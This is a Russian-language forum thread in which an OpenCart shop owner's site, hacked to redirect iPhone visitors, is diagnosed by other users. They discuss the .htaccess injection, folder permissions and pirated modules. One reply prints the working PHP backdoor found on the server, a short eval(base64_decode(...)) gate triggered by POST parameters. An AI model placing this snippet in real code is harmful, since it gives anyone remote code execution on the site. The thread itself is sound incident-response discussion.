Похоже на сайт попал вирус

[dexion]

Доброй ночи всем.

Возникла следующая ситуация: при заходе на мой сайт ** с iPhone возникает необычная проблема (скрины во вложении). 

Действительно ли это вирус? Как с ним бороться?

 

 

*решено

[sitecreator]

Вредоносное ПО установлено у вас на сервере. В этом нет никаких сомнений.

с вашего сайта происходит редирект на сайт злоумышленников.

 

Как бороться? В двух словах этого не описать. И тем более не зная всей картины.

 

Попробуйте обратиться с этой проблемой в "платные услуги".

Но только нужно понимать, что даже если вычистить всю нечисть, которая сейчас есть на сайте, то она может появиться снова если есть, например, на вашем хостинг-аккаунте сайты на вордпресс или джумле.  также возможна брешь у хостера и куча других банальностей (наличие паролей доступа у третьих лиц, кража ftp-паролей с вашего компьютера вирусом).

 

Это я пишу к тому, что нельзя гарантировать 100% безопасность сайта в дальнейшем даже после успешной зачистки сервера.

[dexion]

Удалось решить проблему простым удалением вредоносного кода из .htaccess.

Возможно это только временное решение, посмотрим.

[sitecreator]

Удалось решить проблему простым удалением вредоносного кода из .htaccess.

Возможно это только временное решение, посмотрим.

 

поверьте, это не решение проблемы. это лечение симптомов/последствий, а не причины.

код ведь не их воздуха возник сам по себе.

его туда внедрили.  когда перекроете дыру, только тогда можете говорить о решении проблемы.

 

У вас может быть уже шелл на сервере сидит и под его контролем весь аккаунт (все файлы, БД).

[ravilr]

шаблон купленый?  ;)

[snastik]

Посмотрите в папку downloads, там тоже будет много вкусного!

[dexion]

шаблон купленый?  ;)

нет, шаблон дефолтный

 

 

поверьте, это не решение проблемы. это лечение симптомов/последствий, а не причины.

код ведь не их воздуха возник сам по себе.

его туда внедрили.  когда перекроете дыру, только тогда можете говорить о решении проблемы.

 

У вас может быть уже шелл на сервере сидит и под его контролем весь аккаунт (все файлы, БД).

да, согласен. а может подскажете, каким образом можно обнаружить первоначальную причину всего этого? или наводку кинете. а то в интернете как то не особо много информации про поиск и лечение вирусов на опенкарте

 

 

Посмотрите в папку downloads, там тоже будет много вкусного!

спасибо, глянем

[dexion]

Посмотрите в папку downloads, там тоже будет много вкусного!

в папке download лежат 4 файла http://prntscr.com/2uhwdp :

1) пустой index.php

2) и 3) для маркета

4) непонятно что это и откуда взялось, дата 17.02 относительно недавняя (с какого момента появился этот вирус не знаю, обнаружил только вчера случайно зайдя с телефона). содержание файла примерно следующее: http://prntscr.com/2uhxcr

можно ли считать 4й вариант причиной этой проблемы? 

[Tom]

Это первый звоночек.Не факт что это только в папке Download.Вирус мог легко уже добраться до системных файлов.Где угодно.Среди контроллеров способов доставки-оплаты, ckeditor итд.Вспоминайте сколько дополнений для экономии вы установили с  варезников.Писать доктору , что вы ни с кем ни разу ,только усугубит  положение в поиске  найти лечение .  :ugeek:

[dexion]

Это первый звоночек.Не факт что это только в папке Download.Вирус мог легко уже добраться до системных файлов.Где угодно.Среди контроллеров способов доставки-оплаты, ckeditor итд.Вспоминайте сколько дополнений для экономии вы установили с  варезников.Писать доктору , что вы ни с кем ни разу ,только усугубит  положение в поиске  найти лечение .   :ugeek:

 

Так в том то и дело, что вроде бы уже давненько никаких модулей не ставил. Доступ к фтп был у стороннего человека, но не думаю, что он как то причастен к этому, хотя все возможно. 

[sitecreator]

Я бы не советовал вам удалять сейчас все подозрительные файлы, найденные вами.

В них может оказаться много полезной информации для опытного человека.

это как симптомы болезни для врача.

 

даже установленные права на эти файлы - это уже показатель.

 

у меня сейчас есть некоторое свободное время. если доверяете, то могу посмотреть на вашу проблему изнутри.

для этого нужны коды доступа (в личку, конечно).

[sitecreator]

<?php
if(isset($_POST['execgate'])) {
	set_time_limit(0);ignore_user_abort(1);if(isset($_POST['action'])) {switch($_POST['action']) {case 'update': eval(base64_decode($_POST['file']));break;default: break;}}
}
?>

вот это довольно давно уже было на сайте.

ворота нараспашку.  т. е. кто угодно и когда угодно благодаря этой небольшой вставке мог запускать произвольный код и менять файлы как вздумается.

 

но до поры до времени никто не заходил через эти ворота.

[Denys]

 

а может подскажете, каким образом можно обнаружить первоначальную причину всего этого?

анализируйте лог доступа по дате загрузки подозрительных файлов в папку dоwnload

[sitecreator]

И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код.

 

встречались ли вы с таким подходом?

[markimax]

А какая версия opencart у вас?

Потому что очень уж спокойно вам залили shell в папку download

Какие модули стоят и какие vqmod допилы?

[markimax]

И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код.

 

встречались ли вы с таким подходом?

 

Стабильная тема. Плюс еще файлы назвать именами контроллеров и т.п.

Постоянно обнаруживаю файлы (в старых версиях) в папке download разного рода вредителей, только вот залить, еще не значит получить доступ к ним, так как они получают кодируемое имя. Это если ключ "дефолтный" как у всех в сборках, тогда можно получить контроль.

[sitecreator]

А какая версия opencart у вас?

 

 

для меня определенная загадка почему была выбрана версия 1.5.4 Opencart (не 1.5.4.1 и не ocStore) для создания магазина в конце 2013.

[2c4and]

Такая же фигня

переадресация с данным плеером на сайт люксут

причем на всех сайтах на аккаунте хостера

[dexion]

Такая же фигня

переадресация с данным плеером на сайт люксут

причем на всех сайтах на аккаунте хостера

а какой у вас хостинг? 

[2c4and]

джино

[sitecreator]

Такая же фигня

переадресация с данным плеером на сайт люксут

причем на всех сайтах на аккаунте хостера

 

 

не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам.

 

Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах.  Назначают всем папкам права 777, например (так ведь быстрее движок установить!).

Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема.

[2c4and]

не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам.

 

Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах.  Назначают всем папкам права 777, например (так ведь быстрее движок установить!).

Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема.

 

у меня не на всех папках права 777)))

только на 2-х

[sitecreator]

у меня не на всех папках права 777)))

только на 2-х

 

 

у вас - да.  а у топикстартера, например, все 777, что весьма нехорошо.

 

В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются).  Через них ломают в первую очередь.

 

А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера.

хостинги у вас разные.

[2c4and]

у вас - да.  а у топикстартера, например, все 777, что весьма нехорошо.

 

В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются).  Через них ломают в первую очередь.

 

А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера.

хостинги у вас разные.

http://bestsantehnika.com/

[sitecreator]

2c4and,  движки у вас разных версий, более того в одном случае opencart, в другом (вашем) - ocstore.

как вариант, дело в модулях, полученных из ненадежных источников.  но не обязательно.

 

Если скинете коды доступа в личку, то могу внимательнее посмотреть.